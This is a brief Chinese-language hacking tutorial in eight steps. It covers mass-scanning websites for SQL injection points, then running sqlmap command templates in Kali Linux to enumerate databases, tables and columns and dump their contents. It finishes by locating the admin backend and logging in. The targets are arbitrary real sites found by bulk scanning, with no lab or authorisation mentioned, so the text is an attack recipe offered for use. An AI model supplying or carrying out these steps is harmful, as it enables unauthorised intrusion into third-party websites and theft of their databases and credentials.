第一步:利用傀儡注入點批量掃描工具或者其它方式找出有漏洞的網站
第二步:將傀儡掃到的URL複製到文本文檔,使用超級sql注入工具進行注入掃描操作,確認是否存在注入點的URL
第三步:將有注入點的URL放入到KaliLinux中進行破解,先解析數據庫,命令格式爲sqlmap -u URL地址 --dbs
第四部:在kaliLinux中繼續破解表名,命令格式爲:sqlmap -u URL地址 --tables -D 數據庫名
第五步:在kaliLinux中繼續破解表中的字段名稱,命令格式爲:sqlmap -u URL地址 --columns -T 表名 -D 數據庫名
第六步:在kaliLinux中破解字段裏面的內容,命令格式爲:sqlmap -u URL地址 --dump -C 字段名 -T 表名 -D 數據庫名
第七部:利用後臺掃描工具找到注入網站的後臺
第八步:登陸網站後臺
